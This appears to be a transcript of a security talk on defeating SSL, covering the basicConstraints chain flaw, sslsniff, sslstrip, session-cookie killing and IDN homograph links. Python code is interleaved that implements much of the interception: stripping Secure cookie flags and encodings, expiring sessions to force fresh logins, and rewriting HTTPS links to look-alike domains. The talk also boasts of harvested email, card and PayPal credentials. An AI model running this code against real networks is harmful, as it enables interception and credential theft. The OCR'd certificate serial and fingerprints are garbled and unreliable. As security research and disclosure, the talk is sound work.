[Screenshot: certificate viewer for www.paypal.com; the serial number and fingerprints below are reproduced as OCR'd from the image]

This certificate has been verified for the following uses:
SSL Server Certificate

Issued To
Common Name (CN): www.paypal.com
Organization (O): PayPal Inc.
Organizational Unit (OU): Information Systems
Serial Number: 63:4D:CE:lC:61:9F:FB:6B:2G:lE:05AD:5BA9:85:8e

Issued By
Common Name (CN): Verisign Class 3 Extended Validation SSL SGC CA
Organization (O): Verisign, Inc.
Organizational Unit (OU): Verisign Trust Network

Validity
Issued On: 05/01/2008
Expires On: 05/02/2009

Fingerprints
SHA1 Fingerprint: A4:25:F6:7E:D2:C9:AC:D6:DE:F6:53:DA:79:5E:01:C5:17:FJ3:75:2D
MD5 Fingerprint: 22:B7:78:93:7D:BA:56:8B:84:BD:F9A9:74:70:07:00
[Diagram: a CA certificate signing a site certificate]

CA Certificate
Embedded in browser.
All powerful.
Certifies that a site certificate is authentic.

Site
... based on CA Certificate's signature.

[Diagram: a CA certificate signing an intermediate, which signs a site certificate]

CA Certificate
Embedded in browser.
All powerful.
Certifies that an intermediate CA is authentic.

Intermediate
Not embedded in browser.
Sort of all-powerful.
Certifies that a site certificate is authentic.

Site
... based on CA Certificate's signature.

Certificate Chains Can Be > 3

Root CA -> Intermediate -> Intermediate -> Intermediate -> ...



What they say:

Verify that the leaf node has the name of the site you're connecting to.
Verify that the leaf node hasn't expired.
Check the signature.
If the signing certificate is in our list of root CAs, stop.
Otherwise, move one up the chain and repeat.



Here Be Dragons

Verifying a Certificate Chain to the Root CA
[Diagram: a chain of certificates walked from the leaf up to the root CA, with the check performed at each step]

Verify validity period and verify that this is signed by the root CA. Because the root CA is trusted, validation stops here.
Verify validity period and verify that this is signed by CA One. Because CA One is not trusted, the next certificate is checked.
Verify validity period and verify that this is signed by CA Two. Because CA Two ...
Very tempting to use a simple recursive function.
Everyone focuses on the signature validation.
The result of a naive attempt at validation is a chain that is complete, but nothing more.



What if...
[Diagram: Intermediate -> Intermediate]

What if...
[Diagram: Intermediate -> Intermediate -> Leaf (blueanarchy.org)]



What they say:

Verify that the leaf node has the name of the site you're connecting to.
Verify that the leaf node hasn't expired.
Check the signature.
If the signing certificate is in our list of root CAs, stop.
Otherwise, move one up the chain and repeat.



Something must be wrong, but...

All the signatures are valid.
Nothing has expired.
The chain is intact.
The root CA is embedded in the browser and trusted.

But we just created a valid certificate for PayPal, and we're not PayPal?

...is a somewhat obscure field.
Back In The Day

Most CAs didn't explicitly set basicConstraints: CA=FALSE.
A lot of web browsers and other SSL implementations didn't bother to check it, whether the field was there or not.
Anyone with a valid leaf node certificate could create and sign a leaf node certificate for any other domain.
When presented with the complete chain, IE, Konqueror, OpenSSL, and others considered it valid.
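To make the basicConstraints point concrete, here is an added example (it is not code from the talk or from sslsniff) of a toy chain validator in Python. `validate_naive` does exactly what the "What they say" list describes; `validate_strict` adds the one check that list leaves out: every certificate that signs another must itself carry basicConstraints CA=TRUE. The certificates, the names `Root CA` / `CA One`, the dates and the keys are all constructed for the demo, and signatures are modelled with an HMAC under the issuer's key rather than a real public-key scheme, so only the chain-walking logic carries over to real X.509 validation.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass
from datetime import date
from typing import Dict, List, Optional, Tuple


@dataclass
class Cert:
    """Stripped-down certificate: only the fields the chain walk looks at."""
    subject: str
    issuer: str
    not_before: date
    not_after: date
    is_ca: Optional[bool]   # basicConstraints CA flag; None means the extension is absent
    key: bytes              # stands in for the subject's public key (constructed)
    signature: bytes = b""

    def tbs(self) -> bytes:
        """Fixed serialisation of the signed ('to be signed') fields."""
        return f"{self.subject}|{self.issuer}|{self.not_before}|{self.not_after}|{self.is_ca}".encode()


def issue(subject: str, issuer: "Cert", is_ca: Optional[bool],
          not_before: date, not_after: date) -> Cert:
    """Mint a certificate for `subject` signed under `issuer`'s key.

    Signatures are modelled as an HMAC keyed with the issuer's key, so 'the
    signature verifies' means exactly 'it was produced under the issuer's key'.
    The public/private split of a real signature scheme is deliberately not modelled.
    """
    cert = Cert(subject, issuer.subject, not_before, not_after, is_ca, os.urandom(16))
    cert.signature = hmac.new(issuer.key, cert.tbs(), hashlib.sha256).digest()
    return cert


def signature_ok(cert: Cert, issuer: Cert) -> bool:
    expected = hmac.new(issuer.key, cert.tbs(), hashlib.sha256).digest()
    return hmac.compare_digest(cert.signature, expected)


def _walk(chain: List[Cert], roots: Dict[str, Cert], today: date,
          hostname: str, require_ca: bool) -> Tuple[bool, str]:
    """Chain walk shared by both validators; `require_ca` toggles the basicConstraints check."""
    if not chain:
        return False, "empty chain"
    if chain[0].subject != hostname:
        return False, f"leaf is for {chain[0].subject}, not {hostname}"
    for i, cert in enumerate(chain):
        if not (cert.not_before <= today <= cert.not_after):
            return False, f"{cert.subject} is outside its validity period"
        # Find the signer: a trusted root, or the next certificate in the chain.
        if cert.issuer in roots:
            issuer, at_root = roots[cert.issuer], True
        elif i + 1 < len(chain) and chain[i + 1].subject == cert.issuer:
            issuer, at_root = chain[i + 1], False
        else:
            return False, f"no issuer certificate for {cert.subject}"
        if not signature_ok(cert, issuer):
            return False, f"bad signature on {cert.subject}"
        # The step the naive recursion skips: whoever signed this certificate
        # must itself be allowed to act as a CA (basicConstraints CA=TRUE).
        if require_ca and issuer.is_ca is not True:
            return False, (f"{issuer.subject} signed {cert.subject} but is not a CA "
                           f"(basicConstraints CA={issuer.is_ca})")
        if at_root:
            return True, "chain ends at a trusted root"
    return False, "chain does not reach a trusted root"


def validate_naive(chain, roots, today, hostname):
    """Name, expiry, signature, stop at a trusted root: the 'what they say' list."""
    return _walk(chain, roots, today, hostname, require_ca=False)


def validate_strict(chain, roots, today, hostname):
    """Same walk, plus: every signer must carry basicConstraints CA=TRUE."""
    return _walk(chain, roots, today, hostname, require_ca=True)


# Constructed PKI for the demo: names, dates and keys are made up.
TODAY = date(2009, 2, 1)
VALID = (date(2008, 1, 1), date(2010, 1, 1))
ROOT = Cert("Root CA", "Root CA", *VALID, is_ca=True, key=os.urandom(16))
ROOT.signature = hmac.new(ROOT.key, ROOT.tbs(), hashlib.sha256).digest()  # self-signed
ROOTS = {ROOT.subject: ROOT}
CA_ONE = issue("CA One", ROOT, True, *VALID)
# A legitimate leaf issued the old way: no basicConstraints extension at all.
LEAF = issue("www.blueanarchy.org", CA_ONE, None, *VALID)
# The leaf's key is then used to sign a certificate for somebody else's domain.
FORGED = issue("www.paypal.com", LEAF, None, *VALID)
LEGIT_CHAIN = [LEAF, CA_ONE]
FORGED_CHAIN = [FORGED, LEAF, CA_ONE]

if __name__ == "__main__":
    print("naive, forged :", validate_naive(FORGED_CHAIN, ROOTS, TODAY, "www.paypal.com"))
    print("strict, forged:", validate_strict(FORGED_CHAIN, ROOTS, TODAY, "www.paypal.com"))
    print("strict, legit :", validate_strict(LEGIT_CHAIN, ROOTS, TODAY, "www.blueanarchy.org"))
```

Run as a script, the naive walk accepts the forged chain (every signature checks out and the walk reaches a trusted root), while the strict walk stops at the first hop because `www.blueanarchy.org` is not a CA. Note that the check has to apply to every signer, not only to the root: an intermediate without CA=TRUE is just as much a problem as a leaf used as an issuer.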



And then in 2002... 



Microsoft did something particularly annoying, and 
I blew this up by publishing it. 

Microsoft claimed that it was impossible to exploit. 

So I also published a tool that exploits it. 



sslsniff

Client Side:
Intercepts HTTPS traffic.
Generates a certificate for the site the client is connecting to.
Signs that with whatever certificate you specify.
Proxies data through.

Server Side:
Makes a normal HTTPS connection to the server.
Sends and receives data as if it's a normal client.

sslsniff

Back before people started checking BasicConstraints:
All you had to do was pass sslsniff a valid leaf node certificate for any domain.
It would automatically generate a certificate for the domain the client was connecting to on the fly.
It would sign that certificate with the leaf node.
IE, Konqueror, etc... wouldn't notice the difference.



sslsniff post-disclosure 



You'd be surprised who still doesn't check basic 
constraints. 

Even when people got warning dialogs in browsers 
that had been fixed, most of the time they'd just 
click through them. 

Still useful as a general MITM tool for SSL. 

The folks who did the MD5 hash collision stuff 
used sslsniff to hijack connections once they'd 
gotten a CA cert. 

There are other uses yet, to be disclosed another 



The things you learn in TV studios.
[Screenshot: Bank of America home page, with the "Enter Online ID" / "Password" sign-in form sitting among the site's product links]






The things you learn in TV studios.
[Screenshot: close-up of the "Save this Online ID" / "Password" sign-in form and its submit button]

This button posts to an HTTPS link, but there's no way to know that.
It's a button, so if you mouse-over it, the link isn't displayed in the browser bar at the bottom.
The best you could do would be to view the page source, but that's problematic in browsers like Firefox that issue a second request to the server for the source.



Still prevalent today...
[Screenshot: Wachovia home page, with the "Remember my User ID" / "Password" login form embedded in the page]
Still prevalent today...
[Screenshot: Windows Live ID sign-in page]



Then: A Positive Feedback System 



A number of indicators deployed to designate that 
a page is secure. 

A proliferation of little lock icons. 

URL bars that turn gold. 



Then: An example from Firefox 2
[Screenshot: Firefox 2 on the Yahoo! Mail sign-in page; the status bar reads login.yahoo.com]
Then: An example from Firefox 2
[Screenshot: Firefox 2 on www.riseup.net, showing the certificate warning dialog for admin.riseup.net]

Unable to verify the identity of admin.riseup.net as a trusted site.
Possible reasons for this error:
- Your browser does not recognize the Certificate Authority that issued the site's certificate.
- The site's certificate is incomplete due to a server misconfiguration.
- You are connected to a site pretending to be admin.riseup.net, possibly to obtain your confidential information.
Please notify the site's webmaster about this problem.
Before accepting this certificate, you should examine this site's certificate carefully. Are you willing to accept this certificate for the purpose of identifying the Web site admin.riseup.net?
Examine Certificate...
( ) Accept this certificate permanently
(*) Accept this certificate temporarily for this session
( ) Do not accept this certificate and do not connect to this Web site
Now: A Negative Feedback System 



Less emphasis on sites being secure. 

The proliferation of little locks has been toned 
down. 

Firefox's gold bar is gone. 

More emphasis on alerting users to problems. 

A maze of hoops that users have to jump through 
in order to access sites with certificates that aren't 
signed by a CA. 



Now: An example from Firefox 3
[Screenshot: Firefox 3 on the Yahoo! Mail sign-in page; the status bar reads login.yahoo.com]
Now: An example from Firefox 3
[Screenshot: Firefox 3 error page for https://www.riseup.net/]

Secure Connection Failed
www.riseup.net uses an invalid security certificate.
The certificate is not trusted because the issuer certificate is unknown.
The certificate is only valid for admin.riseup.net
(Error code: sec_error_unknown_issuer)
- This could be a problem with the server's configuration, or it could be someone trying to impersonate the server.
- If you have connected to this server successfully in the past the error may be temporary, and you can try again later.
Or you can add an exception...

Now: An example from IE
[Screenshot: Internet Explorer "Certificate Error: Navigation Blocked" page]

There is a problem with this website's security certificate.
The security certificate presented by this website was not issued by a trusted certificate authority.
The security certificate presented by this website was issued for a different website's address.
We recommend that you close this webpage and do not continue to this website.
- Click here to close this webpage.
- Continue to this website (not recommended).
- More information



Conclusions

If we trigger the negative feedback, we're screwed.
If we fail to trigger the positive feedback, it's not so bad.

People generally encounter SSL in only two ways:
Clicking on links.
Through 302s.

Which means that people only encounter SSL through HTTP...

Remember:
SSL is normally encountered in one of two ways.
By clicking on links.
Through 302 redirects.

We can attack both of those points through an HTTP MITM.



A First Cut Recipe: sslstrip

Switch <a href="https://..."> to <a href="http://..."> and keep a map of what it's changed.
Switch Location: https://... to Location: http://... and keep a map of what's changed.

A First Cut Recipe: sslstrip

When we see an HTTP request for a URL that we've stripped, proxy that request as HTTPS to the server.
Watch the HTTPS traffic go by, log everything if we want, and keep a map of the relative links, CSS links, and JavaScript links that go by.

A First Cut Recipe: sslstrip

The Result:
The server never k...
The client doesn't display any of the disastrous warnings that we want to...
We see all the traffic.



Secure Site
[Screenshot: Gmail "Welcome to Gmail" sign-in page, shown over several slides; the status bar reads www.google.com]
What else can we do?

We've managed to avoid the negative feedback, but some positive feedback would be good too.
People seem to like the little lock icon thing, so it'd be nice if we could get that in there too.



A 1.5 Cut: sslstrip

A new trick:
...do everything as before.
When we see a favicon request for a URL that we've stripped, we'll send back a favicon of our choosing instead.



Once again, a secure site:
[Screenshot: Gmail sign-in page; the status bar reads www.google.com]
We've avoided the negative feedback of...
[Screenshot: Firefox 3 "Secure Connection Failed" page for https://www.riseup.net/, error code sec_error_unknown_issuer]
We can do a subtle MITM via HTTP.
[Screenshot: Gmail sign-in page]



And if we want we can throw in a little lock...
[Screenshot: the same Gmail sign-in page with a lock icon added]
Some sites provide no visible ...
[Screenshot: Wachovia home page, then a close-up of its login widget ("Remember my User ID", "Password", "Service")]
The sites themselves confuse us




A Few Gotchas 



Content encodings that are difficult to parse 
(compress, gzip, etc.). 

Cookies with the Secure flag won't be sent over the 
HTTP connection we've stripped of SSL. 

Cached pages that don't give us a chance to swap 
out their links (the browser sends If-Modified-Since 
and gets a 304 with no body). 




A Simple Solution 

Strip all that stuff too. 

Kill the Secure bit on Set-Cookie headers, strip 
the content encodings we don't like from client 
requests, and strip If-Modified-Since headers too. 
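The three header rewrites above, as an added example (this is not sslstrip's own code). Headers are modelled as (name, value) tuples the way a proxy holds them; the sample request and response in the main block are constructed, and dropping If-None-Match alongside If-Modified-Since is an addition for the same reason (an ETag-based conditional request would also get a 304).

```python
"""Proxy-side header rewriting for the three gotchas above.

Added example, not sslstrip's own code. Headers are modelled as (name, value)
tuples, the way a proxy holds them; the sample headers in __main__ are constructed.
"""
from typing import List, Tuple

Header = Tuple[str, str]

# Conditional-request headers that would let the upstream server answer 304
# from the browser's cache, a page we never get to rewrite. If-Modified-Since
# is the one the slide names; If-None-Match (ETag) is added for the same reason.
CONDITIONAL_HEADERS = {"if-modified-since", "if-none-match"}


def rewrite_request_headers(headers: List[Header]) -> List[Header]:
    """Normalise a client request so the reply is an uncompressed, full body."""
    out: List[Header] = []
    seen_accept_encoding = False
    for name, value in headers:
        key = name.lower()
        if key in CONDITIONAL_HEADERS:
            continue
        if key == "accept-encoding":
            # Ask for 'identity' so gzip/compress/deflate never come back.
            # A server that compresses anyway must still be decoded before rewriting.
            if not seen_accept_encoding:
                out.append((name, "identity"))
                seen_accept_encoding = True
            continue
        out.append((name, value))
    return out


def strip_secure_flag(set_cookie: str) -> str:
    """Drop the Secure attribute from one Set-Cookie value.

    'SID=abc; Path=/; Secure; HttpOnly' -> 'SID=abc; Path=/; HttpOnly'
    Without the flag the browser will also send the cookie on the stripped
    plain-HTTP connection, so the session stays visible to the proxy.
    """
    attrs = [a.strip() for a in set_cookie.split(";")]
    kept = [a for a in attrs if a and a.lower() != "secure"]
    return "; ".join(kept)


def rewrite_response_headers(headers: List[Header]) -> List[Header]:
    """Apply strip_secure_flag to every Set-Cookie header of a response."""
    return [
        (name, strip_secure_flag(value)) if name.lower() == "set-cookie" else (name, value)
        for name, value in headers
    ]


if __name__ == "__main__":
    # Constructed sample headers (not captured traffic).
    request = [
        ("Host", "www.example.com"),
        ("Accept-Encoding", "gzip, deflate"),
        ("If-Modified-Since", "Sat, 01 Jan 2000 00:00:00 GMT"),
        ("Cookie", "lang=en"),
    ]
    response = [
        ("Content-Type", "text/html"),
        ("Set-Cookie", "SID=abc123; Path=/; Secure; HttpOnly"),
    ]
    for h in rewrite_request_headers(request):
        print("request  ->", h)
    for h in rewrite_response_headers(response):
        print("response ->", h)
```

The Accept-Encoding header is replaced rather than deleted: a missing header lets the server pick any encoding, while "identity" asks for none.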



Another problem: sessions 



The most interesting stuff to log is the POSTs that 
would have been sent via SSL. 

Particularly, usernames/passwords. 

Sessions often cause us to miss the login step, 
which is unfortunate: a user with a live session 
cookie never types a password. 

Sure, we can get the session cookie, but that's 
small change. 



And a little less sketchy... 

Sessions expire, and it's not always clear when or why, 
but they don't usually expire right in the middle of an 
active session. So what we do now: 



When we start a MITM against a network, strip all 
the traffic immediately, but don't touch the 
cookies for 5 min (or some specified length of 
time). 

As the cookies go by, make note of the active 
sessions. 

After the time is up, start killing sessions, but only 
new sessions that we haven't seen before. These 
should be the "long running" sessions that won't 
be seen as suspicious should they disappear. 
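The grace-window policy above as an added example (not the talk's tool): watch cookies for the first few minutes, then send a 302 that expires only sessions that were not seen during the window. The timeline in the main block is constructed; the response is returned as a plain dict that a proxy would serialise.

```python
"""Grace-window session killing, as the slide describes it.

Added example, not the talk's tool. The traffic in __main__ is constructed.
Responses are returned as plain dicts; a real proxy would serialise them.
"""
import time
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

EXPIRED = "Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0"
Cookie = Tuple[str, str]


def parse_cookie_header(value: str) -> List[Cookie]:
    """'SID=abc; lang=en' -> [('SID', 'abc'), ('lang', 'en')]"""
    pairs: List[Cookie] = []
    for part in value.split(";"):
        part = part.strip()
        if part:
            name, _, val = part.partition("=")
            pairs.append((name.strip(), val.strip()))
    return pairs


@dataclass
class SessionKiller:
    grace_seconds: float = 300.0                      # the slide's 5 minutes
    started_at: float = field(default_factory=time.time)
    # host -> cookies observed while we were only watching (the long-running sessions)
    seen: Dict[str, Set[Cookie]] = field(default_factory=dict)
    # (host, name, value) we already tried to expire: never 302 the same cookie twice
    killed: Set[Tuple[str, str, str]] = field(default_factory=set)

    def decide(self, host: str, url: str, cookie_header: str,
               now: Optional[float] = None) -> Optional[dict]:
        """None: proxy the request through. dict: answer with this 302 instead."""
        now = time.time() if now is None else now
        cookies = parse_cookie_header(cookie_header)
        if not cookies:
            return None
        known = self.seen.setdefault(host, set())
        if now - self.started_at < self.grace_seconds:
            known.update(cookies)                    # still in the grace window: only take notes
            return None
        fresh = [c for c in cookies
                 if c not in known and (host, c[0], c[1]) not in self.killed]
        if not fresh:
            return None                              # seen during the window, or already expired once
        for name, value in fresh:
            self.killed.add((host, name, value))
        return self.expire_response(host, url, fresh)

    @staticmethod
    def expire_response(host: str, url: str, cookies: List[Cookie]) -> dict:
        """302 back to the same URL with a Set-Cookie that expires each cookie."""
        headers: List[Tuple[str, str]] = [("Location", url)]
        for name, _ in cookies:
            # Caveat: Set-Cookie only replaces a cookie with the same name, domain
            # and path, and a Cookie: header does not tell us what those were.
            # Emit host-only and domain-wide variants for Path=/; a cookie scoped
            # to another path survives, which is why decide() never retries it.
            headers.append(("Set-Cookie", f"{name}=; Path=/; {EXPIRED}"))
            headers.append(("Set-Cookie", f"{name}=; Domain=.{host}; Path=/; {EXPIRED}"))
        return {"status": 302, "headers": headers}


if __name__ == "__main__":
    # Constructed timeline: t is seconds after the MITM started at t=0.
    killer = SessionKiller(grace_seconds=300.0, started_at=0.0)
    traffic = [
        (10.0, "mail.example.com", "http://mail.example.com/inbox", "SID=old; lang=en"),
        (400.0, "mail.example.com", "http://mail.example.com/inbox", "SID=old; lang=en"),
        (410.0, "mail.example.com", "http://mail.example.com/inbox", "SID=new; lang=en"),
        (411.0, "mail.example.com", "http://mail.example.com/inbox", "lang=en"),
    ]
    for t, host, url, cookie in traffic:
        verdict = killer.decide(host, url, cookie, now=t)
        print(f"t={t:5.0f} {cookie!r:22} ->", "pass" if verdict is None else verdict)
```

Only cookies that were absent during the window are expired, so the lang=en cookie seen at t=10 is left alone and the SID=old session survives; SID=new, first seen after the window, gets the 302 exactly once.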



Some Results Of This Trick? 

login.yahoo.com    114 
Gmail               50 
ticketmaster.com    42 
rapidshare.com      14 
Hotmail             13 
paypal.com           9 
linkedin.com         9 
facebook.com         3 



In 24 Hours 



117 email accounts. 

16 credit card numbers. 

7 paypal logins. 

Over 300 other miscellaneous secure logins. 



Combining this technique with homograph attacks. 



Standard homograph attack: 

Sometimes the glyphs of different characters look 
alike. PayPal.com looks like paypal.com but is 
really paypai.com. 

Made more interesting by IDN. It became possible 
to register a domain with characters that appear 
identical to the glyphs of characters in the Latin 
character set. 

In 2005, Eric Johanson registered pаypal.com 
(p&#1072;ypal.com as an HTML entity), which uses the 
Cyrillic 'а' look-alike character and displays as 
paypal.com. 



Combining this technique with homograph attacks. 



What I don't like about the standard attack: 

The attack vector has to be targeted. By 
registering pаypal.com, all we can attack 
is paypal.com. 

Phishing is really just too much work. It'd be nicer 
if we could just MITM a network and get whatever 
people are doing. 

The IDN stuff has been fixed. For TLDs like .com, 
Firefox renders the IDN characters as punycode 
both in the URL bar and the status bar. 



pаypal.com today 

[Screenshot of pаypal.com:] This website is hosted by 3ric Johanson. More information can be found here. 
Also, if you happen to work for paypal, please get in touch with me. I'd like to give 
you your trademarked domain name back, please... 



So how can we reinvent this to attack SSL? 

We can't use .com or any TLD that Firefox will 
render into punycode. 

We want something that we can generalize, not 
just a simple substitution for some particular 
character in a domain. 

So, what's in most URLs? . / & ? 



one trick 



Register a domain like ijjk.cn. 

Get a domain-validated SSL wildcard cert for 
*.ijjk.cn. 

Use IDN-valid characters that look very similar to 
'/' and '?' to create false URLs. 

MITM HTTP and swap out the HTTPS links as usual. 

But this time, instead of just stripping the HTTPS 
links, we swap them out for our own look-alikes. 



one trick 



becomes 

The latter does not display as punycode in the 
status bar or the URL bar. 

When resolved, it becomes 
www.google.xn--comaccountsservicelogin-5j9pia.f.ijjk.cn 

When we MITM these connections, we do SSL on 
both ends, but are able to present our own valid 
*.ijjk.cn cert to the client. 



Here We Go 

Request 

302 for the same URL, but with Set-Cookie: 
headers that expire all the cookies we got 
from the request. 

Request again (sans cookies) 

Proxy HTTP back, and swap out all the HTTPS 
links for our own look-alike HTTPS links. 

SSL request for a look-alike domain that we 

Proxy data back from the actual domain. 
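The look-alike link construction from the "one trick" slides and the last two steps above (swap the HTTPS links, then map the look-alike host back to the real URL), as an added example that is not the talk's tool. Assumptions: we hold a certificate for *.ijjk.cn (the slide's domain); the '/' look-alike is U+2571, which is the character whose punycode reproduces the slide's xn--comaccountsservicelogin-5j9pia label; the slide's extra ".f" label is omitted because its purpose is not stated; no '?' look-alike is chosen, so links with a query string fall back to plain stripping. The HTML in the main block is constructed.

```python
"""Look-alike HTTPS links for a wildcard-cert domain, and the reverse mapping
the SSL side of the MITM needs.

Added example, not the talk's tool. Assumptions: we hold a certificate for
*.ijjk.cn (the slide's domain); the '/' look-alike is U+2571, the character
whose punycode reproduces the slide's xn--comaccountsservicelogin-5j9pia label;
the slide's extra ".f" label is omitted since its purpose is not stated; the
'?' look-alike the slide mentions is not chosen here, so links with a query
string fall back to plain stripping. The HTML in __main__ is constructed.
"""
import re
from typing import Dict, Optional
from urllib.parse import urlsplit

ATTACKER_DOMAIN = "ijjk.cn"
SLASH_LOOKALIKE = "\u2571"            # BOX DRAWINGS LIGHT DIAGONAL UPPER RIGHT TO LOWER LEFT
SAFE_PATH = re.compile(r"^[A-Za-z0-9./-]*$")   # only characters that can live in a hostname
HREF = re.compile(r'(?P<attr>\b(?:href|action|src)=")(?P<url>https://[^"]+)"', re.IGNORECASE)


def to_ascii(host: str) -> str:
    """Unicode host -> the xn-- form the resolver sees (IDNA 2003, as browsers then did)."""
    return host.encode("idna").decode("ascii")


def lookalike_host(url: str) -> Optional[str]:
    """https://www.google.com/accounts/ServiceLogin -> www.google.com╱accounts╱ServiceLogin.ijjk.cn

    Returns None when the URL cannot be disguised: not https, has a port,
    query or fragment, unsafe path characters, or a label that ends up empty
    or longer than 63 octets once punycoded.
    """
    p = urlsplit(url)
    if p.scheme != "https" or not p.hostname or p.port or p.query or p.fragment:
        return None
    path = p.path.rstrip("/")
    if not SAFE_PATH.match(path):
        return None
    host = p.hostname + path.replace("/", SLASH_LOOKALIKE) + "." + ATTACKER_DOMAIN
    try:
        ascii_form = to_ascii(host)       # raises UnicodeError on an empty or oversized label
    except UnicodeError:
        return None
    return host if len(ascii_form) <= 253 else None


class LinkRewriter:
    """Swap HTTPS links in proxied HTML for look-alikes, remembering the mapping."""

    def __init__(self) -> None:
        # punycode host we will see in Host:/SNI -> the real URL to fetch upstream
        self.real: Dict[str, str] = {}

    def rewrite(self, html: str) -> str:
        def swap(m):
            url = m.group("url")
            host = lookalike_host(url)
            if host is None:
                # ordinary sslstrip behaviour: downgrade the link and proxy it ourselves
                return f'{m.group("attr")}http://{url[len("https://"):]}"'
            self.real[to_ascii(host).lower()] = url
            return f'{m.group("attr")}https://{host}"'
        return HREF.sub(swap, html)

    def real_url(self, host_header: str) -> Optional[str]:
        """Host: header of an incoming look-alike request -> the real URL.

        The remembered mapping is used rather than decoding the IDN label:
        nameprep lower-cases it, so /accounts/ServiceLogin would come back
        as /accounts/servicelogin and a case-sensitive path would break.
        """
        return self.real.get(host_header.lower())


if __name__ == "__main__":
    rw = LinkRewriter()
    page = ('<a href="https://www.google.com/accounts/ServiceLogin">Sign in</a>\n'
            '<form action="https://www.example.com/login?service=mail">')
    print(rw.rewrite(page))
    for ascii_host, real in rw.real.items():
        print(ascii_host, "->", real)
```

The length checks matter in practice: a long path produces a single label that exceeds 63 octets after punycode, and such a link has to fall back to ordinary stripping rather than a name the resolver will reject.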



An Example 

[Two screenshots: PNC Bank home page (FDIC Transaction Account Guarantee notice; Online Banking and Bill Pay, Checking, Savings, Loans and Lines of Credit, Cards; Virtual Wallet, Planning for Retirement, Saving for Education, Buying a Home)]
Nice thing about this... 



Happens in real-time. 

Generalized: 

Targets whatever secure sites people are 
browsing to at any moment. 

Doesn't require multiple certificates or 
restricting ourselves to popular sites. 

Once we get a secure POST, we can switch them 
back to a normal traffic stream. 



Lessons... 



Lots of times the security of HTTPS comes down 
to the security of HTTP, and HTTP is not secure. 

If we want to avoid the dialogs of death, start 
with HTTP not HTTPS. 

Once we've got control of that, we can do all 
kinds of stuff to re-introduce the positive 
indicators people might miss. 



